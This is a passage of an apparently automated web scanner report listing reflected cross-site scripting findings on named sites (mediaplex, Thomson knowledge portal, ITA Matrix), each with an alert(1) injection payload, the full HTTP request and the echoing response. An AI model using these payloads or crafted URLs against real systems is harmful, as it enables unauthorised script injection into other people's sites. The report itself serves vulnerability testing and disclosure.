The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 403aa"%3balert(1)//7cc5d18bab was submitted in the mpvc parameter. This input was echoed as 403aa";alert(1)//7cc5d18bab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=403aa"%3balert(1)//7cc5d18bab HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:46 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5137
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="403aa";alert(1)//7cc5d18babhttp://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mp
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("403aa";alert(1)//7cc5d18bab");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("403aa";alert(1)//7cc5d18bab");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("403aa"%3balert(1)//7cc5d1
...[SNIP]...

5.143. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddc4"><script>alert(1)</script>a6ede4c7b5 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-114325-2060-5%3Fmpt%3D%5B1394099180ER%5D%26mpt2%3D%5B1394099180ER%5D&mpt=[1394099180ER]&mpt2=[1394099180ER]&mpvc=5ddc4"><script>alert(1)</script>a6ede4c7b5 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:39:46 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 01:02:26 GMT
ETag: "66ad7c-11e2-4a1634b6b4c80"
Accept-Ranges: bytes
Content-Length: 5210
Content-Type: text/html; charset=ISO-8859-1

<html>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<noscript><a href="5ddc4"><script>alert(1)</script>a6ede4c7b5http://altfarm.mediaplex.com/ad/ck/10105-114325-2060-5?mpt=[1394099180ER]&mpt2=[1394099180ER]" target="_blank">
...[SNIP]...

5.144. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15902/126860/hitachi_anywhere336x280.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c479"-alert(1)-"d9e31151018 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:50:41 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 23:19:56 GMT
ETag: "168a1b-e53-4a07076c13f00"
Accept-Ranges: bytes
Content-Length: 4466
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
   mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018");
   mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
   mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D49269501c479"-alert(1)-"d9e31151018");
   mpck =
...[SNIP]...

5.145. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15902/126860/hitachi_anywhere336x280.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bec5d"%3balert(1)//31de559e8c0 was submitted in the mpvc parameter. This input was echoed as bec5d";alert(1)//31de559e8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/0/15902/126860/hitachi_anywhere336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15902-126860-34879-0%3Fmpt%3D4926950&mpt=4926950&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3af5/3/0/%2a/u%3B240165093%3B0-0%3B0%3B50681866%3B4252-336/280%3B41773561/41791348/1%3B%3B%7Esscs%3D%3fbec5d"%3balert(1)//31de559e8c0 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15902:34879/10105:2060/14302:29115/12309:6712/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:51:05 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 23:19:56 GMT
ETag: "168a1b-e53-4a07076c13f00"
Accept-Ranges: bytes
Content-Length: 4466
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
   mpvclick = encodeURIComponent("http://ad.uk.doubleclick.net/click;h=v8/3af5/3/0/*/u;240165093;0-0;0;50681866;4252-336/280;41773561/41791348/1;;~sscs=?bec5d";alert(1)//31de559e8c0");
   mpvc = mpvclick;
}
else if (mpvce == 2) {
   mpvclick2 = encodeURIComponent("http://ad.uk.doubleclick.net/click;h=v8/3af5/3/0/*/u;240165093;0-0;0;50681866;4252-336/280;41773561/41791348/1;;~sscs=?be
...[SNIP]...

5.146. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/_midframe.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/_midframe.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c&aid=&searchstring=&searchtype=&searchby=&alp=&search= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 573


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<FRAME frameBorder="no" name="frabar" id="frabar" noResize scrolling=no src="midframe_files/_top.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c" style="border-bottom: #003366 1px solid"/>
...[SNIP]...

5.147. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/index.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/index.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&c=&cpc=&cid=&cat=&catURL=&r=0.8218797 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=21; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 1020


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<frame name="fraLeftFrame" BORDERCOLOR=B3B3BA src="_leftframe.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&searchstring=&searchtype=&searchby=&cat=&catURL=" FRAMEBORDER="1" BORDER="1"/>
...[SNIP]...

5.148. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/optframe.aspx

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/optframe.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_midframe.aspx?tab=opt2&aid=&searchstring=&searchtype=&searchby=&alp=&search=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 366


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<frameset rows="*" border="0"
...[SNIP]...
<frame src="opt.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc" marginwidth="5" marginheight="5">
...[SNIP]...

5.149. http://kbportal.thomson.com/index.aspx [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f6c"><script>alert(1)</script>3cb59412b55 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /index.aspx?t=80f6c"><script>alert(1)</script>3cb59412b55&article=&c=12&cid=21&cpc= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571419burp; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=%5B%5BB%5D%5D; s_ppv=100; ASP.NET_SessionId=wmip5h2o1slpk445xan1ev45; BIGipServerKB-80=2240234663.20480.0000; LangCode=en-US; LangId=1; IWICategory=IWICategory=21

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:00:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 978


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<frame name="fraMidFrame" id="fraMidFrame" src="_midframe.aspx?tab=80f6c"><script>alert(1)</script>3cb59412b55&aid=&searchstring=&searchtype=&searchby=&alp=&search=" frameBORDER="no" />
...[SNIP]...

5.150. http://matrix.itasoftware.com/geosearch/service/json/getByCode/salesCity [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /geosearch/service/json/getByCode/salesCity

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 879db<script>alert(1)</script>cb5517fdab7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /geosearch/service/json/getByCode/salesCity?code=BOS&callback=dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.10.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:22 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 257

dojo.io.script.jsonp_dojoIoScript1._jsonpCallback879db<script>alert(1)</script>cb5517fdab7({"timezone":"America/New_York","name":"Boston, MA","salesCityName":"Boston","longitude":-71.005278,"salesCity":"BOS","latitude":42.3644444,"code":"BOS","city":"BOS"})

5.151. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /geosearch/service/json/suggest/citiesAndAirports

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload abc66<script>alert(1)</script>6d35eb2d05e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /geosearch/service/json/suggest/citiesAndAirports?name=b&callback=dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.2.10.1303847824; __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:57:25 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json
Content-Length: 10480

dojo.io.script.jsonp_dojoIoScript2._jsonpCallbackabc66<script>alert(1)</script>6d35eb2d05e([{"timezone":"America/New_York","cityName":"Boston","name":"Boston Logan International, MA (BOS)","score":1077.3821051617047,"longitude":-71.005278,"code":"BOS","latitude":42.3644444,"type":"airport",
...[SNIP]...

5.152. http://matrix.itasoftware.com/xhr/shop/search [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /xhr/shop/search

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 83c7a<script>alert(1)</script>1b026227aec was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xhr/shop/search?name=specificDates&summarizers=carrierStopMatrix%2CcurrencyNotice%2CsolutionList%2CitineraryPriceSlider%2CitineraryCarrierList%2CitineraryDepartureTimeRanges%2CitineraryArrivalTimeRanges%2CdurationSliderItinerary%2CitineraryOrigins%2CitineraryDestinations%2CitineraryStopCountList%2CwarningsItinerary&format=JSON83c7a<script>alert(1)</script>1b026227aec&inputs=%7B%22salesCity%22%3A%22BOS%22%2C%22slices%22%3A%5B%7B%22origins%22%3A%5B%22BOS%22%5D%2C%22destinations%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-04-30%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%2C%7B%22destinations%22%3A%5B%22BOS%22%5D%2C%22origins%22%3A%5B%22MIA%22%5D%2C%22date%22%3A%222011-05-18%22%2C%22isArrivalDate%22%3Afalse%2C%22dateModifier%22%3A%7B%22minus%22%3A0%2C%22plus%22%3A0%7D%7D%5D%2C%22pax%22%3A%7B%22adults%22%3A1%7D%2C%22cabin%22%3A%22COACH%22%2C%22changeOfAirport%22%3Atrue%2C%22checkAvailability%22%3Atrue%2C%22page%22%3A%7B%22size%22%3A30%7D%2C%22sorts%22%3A%22default%22%7D HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
